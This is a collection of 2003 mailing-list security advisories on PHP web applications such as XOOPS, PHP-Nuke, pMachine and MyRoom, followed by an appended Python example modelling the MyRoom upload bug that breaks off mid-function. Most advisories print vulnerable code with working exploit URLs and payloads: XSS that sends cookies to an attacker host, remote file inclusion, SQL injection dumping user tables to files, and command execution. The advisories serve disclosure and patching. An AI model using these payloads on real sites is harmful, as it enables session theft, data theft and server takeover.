BBCode XSS in XOOPS CMS

2003-08-14 Thread Frog Man
Informations :
°
Language : PHP
Bugged Versions : 1.3.x and earlier (+ 2.0.x and earlier? not checked)
Safe Version : 2.0.3
Website : http://www.xoops.org
Problem : BBcode XSS
PHP Code/Location :
°°°
This hole can be exploited through the following modules :
- Private Messages
- News
- NewBB (forum)
class/module/textsanitizer.php :

---
[...]
function xoopsCodeDecode($text){
$patterns = array();
$replacements = array();
[...]
$patterns[] = "/\[color=(['\"]?)([^\']*)\\1](.*)\[\/color\]/sU";
$replacements[] = "<span style='color: #\\2;'>\\3</span>";
$patterns[] = "/\[size=(['\"]?)([^\']*)\\1](.*)\[\/size\]/sU";
$replacements[] = "<span style='font-size: \\2;'>\\3</span>";
$patterns[] = "/\[font=(['\"]?)([^\']*)\\1](.*)\[\/font\]/sU";
$replacements[] = "<span style='font-family: \\2;'>\\3</span>";
[...]
$text = preg_replace($patterns, $replacements, $text);
[...]
return $text;
}
[...]
function oopsHtmlSpecialChars($text) {
$text = htmlspecialchars($text);
$text = str_replace(',',$text);
return $text;
}
[...]
---
Exploit :
°°°
-
[color=FF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color]
[size=10;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/size]

[font=Verdana;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/font]
-
The CSS url() function and the vbscript: scheme are used here, through the
[color], [size] and [font] BBCode tags, to redirect the browser to the URL
abcdef followed by the cookie.
Another CSS function that could be used is expression().

Patch :
°°
Just download the latest version of XOOPS (2.0.3).


[EMAIL PROTECTED]
http://www.phpsecure.info
_




pMachine (PHP) : Include() Security Hole

2003-06-23 Thread Frog Man
Informations :
°
Language : PHP
Version : Free 2.2.1
Website : http://www.pmachine.com
Problem : Include() Security Hole
PHP Code/Location :
°°°
This will work if register_globals is ON *OR* OFF.
/pm/lib.inc.php :
-
if (isset($HTTP_COOKIE_VARS))
{
  while(list($var,$val)=each($HTTP_COOKIE_VARS))
  {
  $$var=$val;
  }
}
if (isset($HTTP_GET_VARS))
{
  while(list($var,$val)=each($HTTP_GET_VARS))
  {
  $$var=$val;
  }
}
if (isset($HTTP_POST_VARS))
{
  while(list($var,$val)=each($HTTP_POST_VARS))
  {
  $$var=$val;
  }
}
if (isset($HTTP_SERVER_VARS))
{
  while(list($var,$val)=each($HTTP_SERVER_VARS))
  {
  $$var=$val;
  }
}
include ("{$pm_path}config$sfx");

if ($debug == 1)
  error_reporting(E_ALL);
else
  error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING);
include ("{$pm_path}db/db.$database$sfx");
include ("{$pm_path}db/db.tables$sfx");
include ("{$pm_path}lib/pmcode.fns$sfx");
include ("{$pm_path}lib/archives.fns$sfx");
include ("{$pm_path}lib/benchmark.class$sfx");
include ("{$pm_path}lib/birthday.fns$sfx");
include ("{$pm_path}lib/calendar.fns$sfx");
include ("{$pm_path}lib/category.fns$sfx");
include ("{$pm_path}lib/censor.fns$sfx");
include ("{$pm_path}lib/comment.fns$sfx");
include ("{$pm_path}lib/deprecated.fns$sfx");
include ("{$pm_path}lib/email.fns$sfx");
include ("{$pm_path}lib/encoded.email$sfx");
include ("{$pm_path}lib/forum.fns$sfx");
include ("{$pm_path}lib/hitcounter.fns$sfx");
include ("{$pm_path}lib/hittracking.fns$sfx");
include ("{$pm_path}lib/ip.fns$sfx");
include ("{$pm_path}lib/linking.fns$sfx");
include ("{$pm_path}lib/mailinglist.fns$sfx");
include ("{$pm_path}lib/member.fns$sfx");
include ("{$pm_path}lib/memberfiles$sfx");
include ("{$pm_path}lib/message.fns$sfx");
include ("{$pm_path}lib/minicalendar.fns$sfx");
include ("{$pm_path}lib/password.fns$sfx");
include ("{$pm_path}lib/pblock.fns$sfx");
include ("{$pm_path}lib/search.fns$sfx");
include ("{$pm_path}lib/shared.fns$sfx");
include ("{$pm_path}lib/stats.fns$sfx");
include ("{$pm_path}lib/tellafriend.fns$sfx");
include ("{$pm_path}lib/timelock.fns$sfx");
include ("{$pm_path}lib/weblog.fns$sfx");
include ("{$pm_path}cp/xmlparser$sfx");
include ("{$pm_path}cp/rss.cp$sfx");
include ("{$pm_path}xmlrpc/ping.fns$sfx");
include ("{$pm_path}xmlrpc/xmlrpc.inc");
-
Exploit :
°°°
http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/&sfx=.txt with :
http://[attacker]/config.txt
or
http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/&sfx=/badcode.txt
with :
http://[attacker]/config/badcode.txt

etc...

Patch :
°°°
A patch can be found on http://www.phpsecure.info.
More Details In French :
°°
http://www.frog-man.org/tutos/pMachineFree2.2.1.txt
_




Re: PHP-Nuke block-Forums.php subject vulnerabilities

2003-04-02 Thread Frog Man
I haven't tested it, but I don't think addslashes() is a good solution here.
The same JavaScript can be executed without ' or ", like this :

"><form name=a><input type=hidden name=u
value=http://www.attacker.com/prova.php></form>
<script>window.open(document.a.u.value+document.cookie)</script>

What do you think about :
$title2 = htmlspecialchars($title2, ENT_QUOTES);


From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: PHP-Nuke block-Forums.php subject vulnerabilities
Date: 31 Mar 2003 11:15:54 -


The block-Forums.php file has a vulnerability if an attacker
inserts a malformed subject into a topic of Splatt
Forum. One such subject is:
<script>alert('bug');</script>

The 'alt' tag is closed by " and the other text is
normal HTML. This bug is very bad if a subject is:
<script>window.open('www.attacker.com/prova.php?cookie='+document.cookie);</script>

And prova.php registers cookies in a file.

The solution:

Add under the $title2 = stripslashes($title2); line this
line:
$title2 = addslashes($title2);
And now, before any " there is a backslash!




--
[EMAIL PROTECTED]
http://www.phpsecure.info
_




PHP-Nuke 6.0 & 6.5RC2 SQL Injection Again

2003-03-11 Thread Frog Man


Informations :
°°
Language : PHP
Website : http://www.phpnuke.org
Version : 6.0 & 6.5 RC2
Modules : Forums, Private_Messages
Problem : SQL Injection
PHP Code/Location :
°°°
/modules/Forums/viewtopic.php :

$sql = "SELECT forum_type, forum_id, forum_pass, forum_name, forum_access,
forum_moderator, forum_atch FROM ${prefix}_forums WHERE forum_id =
'$forum'";


/modules/Forums/viewforum.php :


$sql = "SELECT f.forum_id, f.forum_type, f.forum_pass, f.forum_name,
u.uname, u.uid, m.forum_id, m.user_id FROM
${prefix}_forums f, ".$user_prefix."_users u, ${prefix}_forum_mods m
WHERE f.forum_id = '$forum' AND m.forum_id = '$forum' AND m.user_id =
u.uid";


/modules/Forums/reply.php :

$sql = "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM
${prefix}_forums WHERE (forum_id = '$forum')";


/modules/Forums/newtopic.php :

$sql = "SELECT forum_type, forum_pass, forum_name, forum_access,
forum_moderator, forum_atch FROM ${prefix}_forums WHERE (forum_id =
'$forum')";


/modules/Forums/editpost.php :
$sql = "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM
${prefix}_forums WHERE forum_id = '$forum'";


/modules/Private_Messages/reply.php :

if ($reply || $send) {
   if ($uname != "") {
	$res = sql_num_rows(sql_query("select * from ".$user_prefix."_users where
uname='$uname'", $dbi), $dbi);




Exploits :
°°
- These will save forum information into a text file :
http://[target]/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1'%20INTO%20OUTFILE%20'[path/to/site]/vt.txt
http://[target]/modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/*
http://[target]/modules.php?op=modload&name=Forums&file=reply&forum=1')%20INTO%20OUTFILE%20'[/path]/reply.txt'/*
http://[target]/modules.php?op=modload&name=Forums&file=newtopic&forum=1')%20INTO%20OUTFILE%20'[/path]/newtopic.txt'/*
http://[target]/modules.php?op=modload&name=Forums&file=editpost&forum=1'%20INTO%20OUTFILE%20'[/path]/editpost.txt

etc...



- This will save all user information into a text file :

http://[target]/modules.php?name=Private_Messages&file=reply&send=1&uname='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/users.txt



Patch :
°°°
A patch can be found on http://www.phpsecure.info


More Details In French :

http://www.frog-man.org/tutos/PHP-Nuke6.0-Forums-Private_Messages.txt
[EMAIL PROTECTED]







_
Recevez vos e-mails MSN Hotmail par SMS sur votre GSM ! 
http://www.fr.msn.be/gsm/servicesms/hotmailparsms



PHP-Nuke 6.0 (& 6.5?) : Serious SQL Injection Security Holes

2003-03-06 Thread Frog Man
Informations :
°°
Language : PHP
Website : http://www.phpnuke.org
Versions : 6.0 (& 6.5?)
Modules : Members_List, Your_Account
Problem : SQL Injection
PHP Configuration : This will work if magic_quotes_gpc=OFF.
PHP Code/Location :
°°°
/modules/Members_List/index.php :

[...]
   $count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";
   $select = "select uid, name, uname, femail, url from ".$user_prefix."_users ";
	$where = "where uname != 'Anonymous' ";

if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {
   $where .= "AND uname like '".$letter."%' ";
   } else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {
   $where .= "AND uname REGEXP \"^\[1-9]\" ";
   } else {
   $where .= "";
   }
   $sort = "order by $sortby";
   $limit = " ASC LIMIT ".$min.", ".$max;
   $count_result = sql_query($count.$where, $dbi);
   $num_rows_per_order = mysql_result($count_result,0,0);
   $result = sql_query($select.$where.$sort.$limit, $dbi) or die();

   echo "<br>";
   if ( $letter != "front" ) {
   echo "<table width=\"100%\" border=\"0\" cellspacing=\"1\"><tr>\n";
   echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._NICKNAME."</b></font></td>\n";
   echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._REALNAME."</b></font></td>\n";
   echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._EMAIL."</b></font></td>\n";
   echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._URL."</b></font></td>\n";
   $cols = 4;
[...]


/modules/Your_Account/index.php :

switch($op) {
[...]
   case "mailpasswd":
	mail_password($uname, $code);
	break;
   case "userinfo":
	userinfo($uname, $bypass, $hid, $url);
	break;
   case "login":
	login($uname, $pass);
	break;
[...]
   case "saveuser":
	saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass,
$bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);
	break;
[...]
   case "savehome":
	savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,
$popmeson);
	break;

   case "savetheme":
	savetheme($uid, $theme);
	break;
[...]
   case "savecomm":
	savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);
	break;
[...]
}

/modules/Your_Account/index.php :

[...]
function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass,
$vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {
   global $user, $cookie, $userinfo, $EditedMessage, $user_prefix, $dbi,
$module_name;
   cookiedecode($user);
   $check = $cookie[1];
   $check2 = $cookie[2];
   $result = sql_query("select uid, pass from ".$user_prefix."_users where uname='$check'", $dbi);
   list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
   if (($uid == $vuid) AND ($check2 == $ccpass)) {
	if (!eregi("http://", $url)) {
	$url = "http://$url";
	}
	if ((isset($pass)) && ($pass != $vpass)) {
	echo "<center>"._PASSDIFFERENT."</center>";
	} elseif (($pass != "") && (strlen($pass) < $minpass)) {
	echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b> "._CHARLONG."</center>";
	} else {
	if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio = FixQuotes($bio); }
	if ($pass != "") {
		cookiedecode($user);
		sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);
		$pass = md5($pass);
		sql_query("update ".$user_prefix."_users set name='$realname', email='$email', femail='$femail', url='$url', pass='$pass', bio='$bio', user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ', user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig', user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm', newsletter='$newsletter' where uid='$uid'", $dbi);
		$result = sql_query("select uid, uname, pass, storynum, umode, uorder, thold, noscore, ublockon, theme from ".$user_prefix."_users where uname='$uname' and pass='$pass'", $dbi);
		if(sql_num_rows($result, $dbi)==1) {
		$userinfo = sql_fetch_array($result, $dbi);
		docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
		} else {
		echo "<center>"._SOMETHINGWRONG."</center><br>";
		}
		sql_query("UNLOCK TABLES", $dbi);
	} else {
		sql_query("update ".$user_prefix."_users set name='$realname', email='$email', femail='$femail', url='$url', bio='$bio',

GTcatalog (PHP)

2003-03-03 Thread Frog Man


Informations :
°°
Version : 0.9
Website : http://www.geektweaked.com
Problem :
- Information disclosure (admin password)
- File inclusion


PHP Code/Location :
°°°
password.inc :
<?
$globalpw = "[PASSWORD]";
?>
index.php :

[...]
switch ($function)
{
case "custom":

$cc = new Template();
$cc->set_file("head",$dir_base.$dir_template."header.inc");
$cc->set_var(array('clientcode' => $cfg_clientcode,
                   'title' => $cfg_title." - ".$custom));
$cc->parse("output","head");
$cc->p("output");
include($custom.".custom.inc");
include ($dir_base.$dir_template."footer.inc");
break;
[...]

Exploits :
°°
- http://[target]/password.inc
- http://[target]/index.php?function=custom&custom=http://[attacker]/1
with :
http://[attacker]/1.custom.inc
Patch :
°°°
A patch can be found on http://www.phpsecure.info (- New Version !! :))
More Details :
°°
In French :
http://www.frog-man.org/tutos/GTcatalog.txt
[EMAIL PROTECTED]



_
MSN Messenger : discutez en direct avec vos amis !  
http://messenger.fr.msn.be



Invision Power Board (PHP)

2003-02-27 Thread Frog Man


Informations :
°°
Website : http://www.invisionboard.com
--
Version : 1.0.1
Problem : phpinfo()
--
Version : 1.1.1
Problem : File inclusion
PHP Code/Location :
°°°
v1.0.1 :
phpinfo.php :
--
<?php
phpinfo();
?>
--
v1.1.1 :
ipchat.php :
-
require $root_path."conf_global.php";
-
(this is a hole if register_globals=ON)
Exploits :
°°
v1.0.1 :
http://[target]/phpinfo.php
v1.1.1 :
http://[target]/ipchat.php?root_path=http://[attacker]/
with :
http://[attacker]/conf_global.php
Patches :

Patches for both versions have been published on http://www.phpsecure.org .
More Details :
°°
In French :
http://www.frog-man.org/tutos/InvisionPowerBoard.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FInvisionPowerBoard.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
[EMAIL PROTECTED]



_



Myguestbook (PHP)

2003-02-21 Thread Frog Man


Informations :
°°
Version : 3.0
Website : http://www.tefonline.net/
Problems :
- XSS - admin info recovery
- Access to admin pages
PHP Code/Location :
°°°
If pseudo = [SCRIPT],
e-mail = [SCRIPT]
or message = </textarea>[SCRIPT],
[SCRIPT] will be executed on index.php, /admin/user_modif.php,
/admin/admin_modif.php and /admin/admin_suppr.php .

/admin/confirm_connect.php :
-
SetCookie("Myguestbook","$name:$password");
-




/admin/admin_pass.php, /admin/admin_index.php, /admin/admin_modif.php and 
/admin/admin_suppr.php :

<?
if(!isset($Myguestbook))
	  header("location:../index.php?MSG=permis");
?>




Exploits :
°°
[SCRIPT] :
<script>
location='http://[attacker]/file.php?'+document.cookie;
</script>
http://[target]/admin/admin_index.php?Myguestbook=1
http://[target]/admin/admin_pass.php?Myguestbook=1
http://[target]/admin/admin_modif.php?Myguestbook=1
http://[target]/admin/admin_suppr.php?Myguestbook=1


http://[target]/admin/user_modif.php?id=[MESSAGEID]



Solution :
°°
A patch can be found on http://www.phpsecure.org.
More Details :
°°
In French :
http://www.frog-man.org/tutos/Myguestbook.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyguestbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


[EMAIL PROTECTED]



_




php-Board (php)

2003-02-18 Thread Frog Man


Informations :
°°
Website : http://www.hp-planet.de
Version : 1
Problem : Information disclosure


PHP Code/Location :
°°°
login.php :
-
function passwd2($user)
{
$password="nicht registriert";
if (file_exists("user/".$user.".txt"))
{
$fp = fopen("user/".$user.".txt","r");
$data = fgetcsv($fp,1,"#");
fclose($fp);
$password=$data[0];
}
return($password);
}
</gr_repl>

<gr_replace lines="699" cat="reformat" orig="http://translate.google.com">
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools
-



Exploit :
°
http://[target]/user/[NICKNAME].txt



More details :
°°
In French :
http://www.frog-man.org/tutos/5holes8.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txtlangpair=fr%7Cenhl=frie=ISO-8859-1prev=%2Flanguage_tools





frog-m@n
http://www.phpsecure.org



_





DotBr (PHP)

2003-02-18 Thread Frog Man


Informations :
°°
Website : http://dotbr.org
Version : 0.1
Problems :
- phpinfo()
- Information disclosure
- System commands execution


PHP Code/Location :
°°°
foo.php3 :
-
<? phpinfo(); ?>
-


config.inc :
- SQL password
- SQL host
- SQL username
- SQL DB name


admin/exec.php3 :
---
<html>
<body>
<pre>
<?
 if (!isset($sep)) {
   $sep = "_";
 }
 $cmd=str_replace($sep," ",$cmd);
 passthru($cmd,$ret);
 echo $ret;
?>
</pre>
</body>
</html>
---


admin/system.php3 :
---
<html>
<body>
<pre>
<?
 $cmd = str_replace("_"," ",$cmd);
 system($cmd,$result);
 echo "\n result == " . $result . "\n";
?>
</pre>
</body>
</html>
---


Exploits :
°°
http://[target]/foo.php3
http://[target]/config.inc
http://[target]/admin/exec.php3?cmd=[COMMAND]
http://[target]/admin/system.php3?cmd=[COMMAND]



More Details :
°°
In French :
http://www.frog-man.org/tutos/5holes8.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools




frog-m@n
http://www.phpsecure.org




_





D-Forum (PHP)

2003-02-18 Thread Frog Man

Informations :
°°
Website : http://www.adalis.fr/adalis.html
Versions : 1.00 - 1.11
Problem : Include file


PHP Code/Location :
°°°

/includes/header.php3 :
---
<?php
if ($my_header!="")
{
include ($my_header);
} else {
?>
...
--


/includes/footer.php3 :
---
...
if ($my_footer!="")
{
include ($my_footer);
} else {
?>
...
---



Exploits :
°°
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt 
or 
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt 
with
http://[attacker]/script.txt


Patch :
°°°
A patch can be found on http://www.phpsecure.info .

More details :
°°
(in French) http://www.frog-man.org/tutos/5holes8.txt




frog-m@n




_



phpMyShop (php)

2003-02-03 Thread Frog Man


Informations :
°°
Version : 1.00
Website : http://www.pc-encheres.com
Problem : SQL Injection


PHP Code/Location :
°°°
compte.php :
---
<?
session_start();

if (isset($achat))
{
session_register("achat");
}
else
{
header("location:index.php");
}

include("design/header.php");
require("config.php");
require("fonction.php");

echo"<td bgcolor=\"$barre1\"><font color=\"$police3\" size=\"$width_police2\"><strong>Identification</strong></font></td>
 </tr>
 <tr>
   <td><br>";

if (isset($valider))
{
$sql = "SELECT id_cli,login_cli,pass_cli FROM $table_client where login_cli='$identifiant' and pass_cli='$password'";
$sql = mysql_db_query($base,$sql);
$test = mysql_num_rows($sql);
if ($test==0)
{
?>
<script language=javascript>
alert("Identifiant ou mot de passe non valide!");
</script>
<?
echo"<center><strong>Identifiant ou mot de passe non valide!</strong></center><br>";
}
else
{
$id_membre = mysql_result($sql,0,"id_cli");
session_register("id_membre");
?>
<script language=javascript>
document.location.href="valide.php"
</script>
<?
}
}

[...]
---



Exploit :
°
http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='


Solution :
°°
A patch has been published on http://www.phpsecure.info .



More details :
°°
In French :
http://www.frog-man.org/tutos/phpmyshop.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2Fphpmyshop.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools



frog-m@n


_



myphpPagetool (php)

2003-02-03 Thread Frog Man

Informations :
°°
Version : 0.4.3-1
Website : http://myphppagetool.sourceforge.net/
Problem : Include file


PHP Code/Location :
°°°
In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php, 
help4.php, help5.php, help6.php, help7.php, help8.php and help9.php :


<?php
include ($ptinclude . "/pt_config.inc");
[...]





Exploit :
°
http://[target]/doc/admin/index.php?ptinclude=http://[attacker]
with :
http://[attacker]/pt_config.inc

(if register_globals=ON)


Solution :
°°
A patch has been published on http://www.phpsecure.info .


More details :
°°
In French :
http://www.frog-man.org/tutos/myphpPagetool.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FmyphpPagetool.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n


_
MSN Search, le moteur de recherche qui pense comme vous !  
http://search.fr.msn.be



Re: dotproject Remote Code Execution Vulnerability : Patch

2003-01-29 Thread Frog Man

A non-official patch has been created for this hole and is published on
http://www.phpsecure.org/index.php?zone=pPatch&AsAlpha=d&l=us (English
version).





From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: dotproject Remote Code Execution Vulnerability
Date: Wed, 29 Jan 2003 04:02:24 -0800

dotproject Remote Code Execution Vulnerability (By Mindwarper)

--- ---

--
Vendor Information:
--

Homepage : http://www.dotproject.net
Vendor : informed
Mailed advisory: 28/01/03
Vender Response : None


--
Affected Versions:
--

dev20030121


--
Vulnerability:
--


dotproject is a PHP+MySQL beta-level web-based project management and
tracking tool that dotmarketing started in Dec. 2000.
Inside the directory /modules/, multiple files try to include
classdefs/date.php without defining $root_dir first, and allow remote
attackers to inject their own servers if globals are set on.

Example Code from modules/projects/addedit.php:

**

<?php
##
## Files modules: index page re-usable sub-table
##

require_once( "$root_dir/classdefs/date.php" );
$df = $AppUI->getPref('SHDATEFORMAT');
$tf = $AppUI->getPref('TIMEFORMAT');

**

As you can see, nothing happens before the require_once function is called,
and therefore with globals set on an attacker may include remote files.

Example:

http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker

this works also on

http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker
http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker
http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker
http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker
http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker


--
Solution:
--

Please check the vendor's website for new patches.

As a temporary solution, create a .htaccess file that contains 'Deny from 
all'.
Place it in the /modules/ directory and that should block remote users from 
accessing it.


--
Contact:
--

Name: Mindwarper
Email: [EMAIL PROTECTED]
Website: http://mindlock.bestweb.net


--- ---






_





Re: Zorum Portal (PHP)

2003-01-27 Thread Frog Man
A patch has been created for this hole and can be found on 
http://www.phpsecure.org/.






From: MGhz [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Zorum Portal  (PHP)
Date: 22 Jan 2003 19:45:26 -



Version : 3.0;3.1;3.2
Website : http://zorum.phpoutsourcing.com/
Problem : Include file


File:
-
include.php
-

PHP Code:
-
[...]
include("$gorumDir/generformlib_multipleselection.php");
include("$gorumDir/generformlib_groupselection.php");
include("$gorumDir/generformlib_filebutton.php");
include("$gorumDir/group.php");
[...]
-

Exploit :
-
http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
--
include http://[attacker]/group.php on remote server
-

--
[EMAIL PROTECTED]



_





MyRoom (PHP)

2003-01-22 Thread Frog Man
Informations :
°°
Website : http://www.plansbiz.net
Version : 3.5 GOLD
Problems : File copy/upload


PHP Code/Location :
°°°
room/save_item.php :

if($name == "" OR $ref == ""){
echo "You are fogot enter your 'ITEM NAME' or 'ITEM REF NO' !";
echo "<br>";
echo "<a href='$main_file?show=additem'>Try Agains [ Click Here ]</a>";
exit;
}

if($photo!="none" AND $photo!="application/octet-stream"){

	//get type of file
	$filetype=$photo_type;

	//get lenght of image type
	$filelenght=strlen($filetype);

	//get part of file image to build image extension
	$pos=strpos($filetype,"/")+1;

	//build extension of image
	$fileextention=substr($filetype,$pos,$filelenght);

	if($fileextention=="pjpeg"){
	$fileextention="jpg";
	}


	$image=date("YmdHis");
	$image.=".".$fileextention;
	$imgpath = $imgroot;

	//if image exist, upload it in correct dir
	if($photo<>"none") {
	  if(!copy($photo,"$imgpath/$image")) {
		//display errors
		$msg="<br><font color='text00'>File Not Uploaded, it might be too large or does not exist..<br>Please Try Again!</font>";
		break;
	  }
	//or finish
	  else {
	  	dbconnect();
	  	$sql= "INSERT INTO room_item SET it_photo='$image', it_name='$name', it_decs='$decs', it_ab='$album', it_ref='$ref'";
		mysql_query($sql) or die(mysql_error());
		echo "<meta http-equiv='refresh' content='0;URL=$main_file?show=additem&m=1&i=$name'>";
	   	echo "<br>Your File Was Uploaded Sucessful!! <br><br><a href='$main_file?show=additem&m=1&i=$name'>Loading ..</a>";
	  }
	}




Exploits :
°°
http://[target]/room/save_item.php?name=[NAME]&ref=hacked&photo=../inc/conf.php&photo_type=ttxt

+ http://[target]/room/index.php?show=search&search=it_name&item=[NAME]
to find the URL of the txt file into which conf.php was copied.

Patch :
°°°
A patch can be found on http://www.phpsecure.info (english version 
available) .


More Details :
°°
In French :
http://www.frog-man.org/tutos/MyRoom.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyRoom.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools




frog-m@n




_
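Added example, not MyRoom's code: a Python model of the two defects in
save_item.php above, the extension cut out of the client's photo_type after
its first "/" (which is why the exploit sends photo_type=ttxt: strpos()
returns false, false+1 is 1, and the extension becomes "txt") and copy() run
on a client-supplied path, beside a version that only accepts a source from
the upload temp directory (what is_uploaded_file()/move_uploaded_file() give
you in PHP), takes the extension from an allow-list, checks the file's magic
bytes and uses an unpredictable name. The directory layout, helper names,
magic-number table and sample request are this example's own.

```python
"""Upload naming from a client-supplied MIME type: MyRoom's shape beside a
checked one.

Added example (Python modelling the PHP logic), not MyRoom's code.  Helper
names, the allow-list, the magic-number table and the sample request are this
example's own.
"""
import datetime
import os
import secrets
import shutil
import tempfile


class UploadError(Exception):
    pass


def image_name_vulnerable(photo_type: str, now: datetime.datetime) -> str:
    """substr($filetype, strpos($filetype, "/") + 1): with no '/' in the type,
    strpos() is false, false + 1 is 1, and the extension is the type minus its
    first character.  photo_type=ttxt therefore yields a date-stamped .txt."""
    slash = photo_type.find("/")
    pos = slash + 1 if slash >= 0 else 1          # PHP: false + 1 == 1
    ext = photo_type[pos:]
    if ext == "pjpeg":
        ext = "jpg"
    return now.strftime("%Y%m%d%H%M%S") + "." + ext


def save_item_vulnerable(photo: str, photo_type: str, imgroot: str,
                         now: datetime.datetime) -> str:
    """copy($photo, "$imgpath/$image"): $photo is any path the web server can
    read, so a config file lands under the image directory with a .txt name."""
    dest = os.path.join(imgroot, image_name_vulnerable(photo_type, now))
    shutil.copyfile(photo, dest)
    return dest


# Hardened version: the MIME type only selects from an allow-list, the bytes
# must agree with it, the source must be a real upload, and the name is random.
_ALLOWED = {"image/jpeg": ("jpg", b"\xff\xd8\xff"),
            "image/pjpeg": ("jpg", b"\xff\xd8\xff"),
            "image/png": ("png", b"\x89PNG\r\n\x1a\n"),
            "image/gif": ("gif", b"GIF8")}


def save_item_safe(photo: str, photo_type: str, imgroot: str, upload_tmp: str) -> str:
    src, tmp = os.path.realpath(photo), os.path.realpath(upload_tmp)
    # is_uploaded_file(): the source has to live in the upload temp directory.
    if os.path.commonpath([src, tmp]) != tmp or not os.path.isfile(src):
        raise UploadError("not an uploaded file: %r" % photo)
    if photo_type.lower() not in _ALLOWED:
        raise UploadError("type not allowed: %r" % photo_type)
    ext, magic = _ALLOWED[photo_type.lower()]
    with open(src, "rb") as f:
        if f.read(len(magic)) != magic:
            raise UploadError("content does not match %s" % photo_type)
    dest = os.path.join(imgroot, "%s.%s" % (secrets.token_hex(16), ext))
    shutil.move(src, dest)                         # move_uploaded_file()
    return dest


def demo() -> dict:
    """Constructed layout: inc/conf.php beside the image directory, and the
    exploit request photo=../inc/conf.php&photo_type=ttxt from the post."""
    now = datetime.datetime(2003, 1, 22, 12, 0, 0)
    results = {}
    with tempfile.TemporaryDirectory() as root:
        inc, imgroot, tmp = (os.path.join(root, d) for d in ("inc", "images", "phptmp"))
        for d in (inc, imgroot, tmp):
            os.makedirs(d)
        with open(os.path.join(inc, "conf.php"), "w") as f:
            f.write("<?php $db_pass = 'constructed-secret'; ?>\n")

        exploit_photo = os.path.join(imgroot, "..", "inc", "conf.php")
        dest = save_item_vulnerable(exploit_photo, "ttxt", imgroot, now)
        results["vuln_name"] = os.path.basename(dest)
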